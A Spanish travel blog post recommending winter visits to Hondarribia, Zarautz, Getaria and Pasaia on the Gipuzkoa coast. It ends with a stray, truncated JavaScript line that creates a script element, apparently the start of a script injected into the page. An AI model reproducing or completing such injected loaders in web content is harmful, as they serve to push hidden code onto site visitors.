Atardecer guipuzcoano con Víctor Hugo

08/03/2012

La costa no es solo para el verano. Y menos en Guipúzcoa. Sus paisajes verdes, sus cielos cenizos y las fachadas coloridas de sus casas se matizan con la luz del invierno. Si está preparando un viaje a San Sebastián, valore la posibilidad de escaparse a algunas de sus villas marineras, que hace siglos vivían de la captura de la ballena y de toda la industria que generaba. Hoy muestran todo su encanto histórico al turista que huye de las multitudes del verano. Aquí les resaltamos cuatro paradas esenciales.

  • Hondarribia. Casi en la frontera con Francia y junto a Irún, esta localidad brilla con el río Bidasoa y sus murallas. Comience la ruta en la Puerta de Santa María para adentrarse por las callejuelas y placitas repletas de flores y balcones de madera. El barrio de la Marina, el de los pescadores, es ideal para sentarse a comer. Y si quiere dormir como un noble, quédese en el parador, situado en el Castillo de Carlos V.
  • Zarautz. Animado a todas horas y lleno de jóvenes, Zarautz es un buen lugar para pasárselo bien. Su casco histórico no es tan espectacular, pero todo lo compensa su ambiente de tascas y tiendas. Pasee por la calle Navarra y verá la Academia de Música y la iglesia de los Franciscanos. Su playa es la más larga de Guipúzcoa y una multitud de surfistas se encaraman a sus olas bravías.
  • Getaria. Todavía es un secreto turístico, a pesar de encontrarse a solo 4 kilómetros de Zarautz. Sus calles empedradas, con la Iglesia de San Salvador como principal atractivo histórico, y su bahía nos llenan de paz. Aquí nació el navegante Juan Sebastián Elcano y el diseñador de moda Cristóbal Balenciaga, cuya figura podrá conocer mejor en su flamante museo del Palacio de Aldamar. Desde lo alto del monte donde se ubica, las vistas son únicas.
  • Pasaia. Esta villa se divide en cuatro zonas y está formada por un mosaico precioso de paisajes y playas paradisíacas. Visite la iglesia de San Juan Bautista, con un espectacular retablo barroco, y la casa-museo donde vivió por temporadas el mismísimo Víctor Hugo. Cruce en una encantadora barquita desde San Pedro a San Juan y contemple, quizá con la lluvia, los extraordinarios atardeceres. Unos de los más bonitos del Cantábrico.

Datos útiles:

  • Guipúzcoa tiene 707.263 habitantes
  • El tiempo en Euskadi es lluvioso en invierno y poco caluroso en verano.

Foto | pablofausto

var d=document;var s=d.createElement(‘script’);